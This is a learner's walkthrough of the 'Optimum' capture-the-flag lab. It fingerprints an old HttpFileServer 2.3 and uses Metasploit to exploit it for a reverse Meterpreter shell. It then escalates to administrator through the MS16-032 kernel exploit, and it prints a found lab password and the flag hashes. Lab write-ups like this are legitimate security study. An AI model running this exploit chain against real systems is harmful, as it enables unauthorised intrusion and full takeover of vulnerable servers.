Optimum

TARGET IP: 10.10.10.8

HOST IP: 10.10.16.10

Recon

NMAP

nmap [Target IP]

nmap [Target IP] -A -p 80

HTTP

• Nothing on page source that I could find.

• It is using HttpFileServer 2.3

  • Their latest version is 2.3m

• The login button opens up prompt for login.

• Let's take a crack at logging in with credentails admin:admin.

• Discovered new directory /~login. This uses a tildy infront.

Vulnerable Software

• HFS 2.3 is old and filled with goodies.

• Lots of vulnerabilities are mentioned on their own website:

• Exploit DB has two verified exploits 1 & 2.

Enumeration

Gobuster

gobuster dir -u http://[Target IP] -w /usr/share/dirb/wordlists/common.txt 

• Try putting a ~ at the end since we saw that the /~login directory had it.

gobuster dir -u http://[Target IP]/~ -w /usr/share/dirb/wordlists/common.txt 

WinPEASx64

• Credentials for kostas

kdeEjDowkS*

• I need to be better at looking through these to see if I could've found more information.

Browsing

• Run the typical commands from the hacktricks checklist to see some information on the system.

sysinfo

• This will tell us the system is Windows 12 Server R2.

• This is a 64-bit system.

Exploit

Metasploit

• Let's check out Metasploit

msfconsole
search hfs

use 1
show options

set rhosts [Target IP]
set lhost [Host IP]
check 
exploit

• Now we have a Meterpreter session.

shell
whoami

type C:\Users\kostas\Desktop\user.txt

• User Flag

b9058357319a5b76f10e01253a382c67

• Next step is to use Metasploit to gain root privileges. I tried browsing the system for a while but didn't find anything useful. The tool I need is a kernel exploit.

• When we ran the sysinfo command we found the system is a Windows 2012 R2 server which is a 64-bit architecture. The reverse_tcp_shell that we are using as our payload is a 32-bit process. We should migrate over to a different process that is 64-bit.

• On the meterpreter shell run the following.

ps

• We see that the explorer.exe process is running on PID 660.

• Let's migrate over to this process.

migrate [PID for explorer.exe]

• Next, let's background the current meterpreter system we have in the system.

bg

• We can confirm this has been backgrounded:

sessions

• Since we now have access to the windows system, let's see if we can find another metasploit local exploit to root privileges.

search exploit/windows/local

• I had to get a hint here and use a Microsoft vulnerability in the system MS16_032.

use 33

• I'm not sure if winPEASx64 showed this somewhere but I could have also used a tool called window-exploit-suggester. Here is a write-up on how to use it. It's a bit complicated as you run it on your host system by exporting the target system info.

• After selecting our exploit in Metasploit we will then set it up and run it.

show options
set session 1
set lhost [Host IP]

exploit

• We now have a shell to the system as administrator.

shell
type C:\Users\Administrator\Desktop\root.txt

64869e78042316656ffc989ba52d5d2b

Conclusion

• I knew going into this lab that I could use Metasploit. I didn't know when I would get to use it but knew it was an option. I wanted to try to get access to the system without Metasploit but I don't think my level of skill is high enough to do it, let alone understand it.

• I need to work on my enumeration skills with Windows systems. I have a far better understanding of them with Linux and could probably spend some more time with Windows.

• It was a good lab but I'd really like to finish one of these without help one day.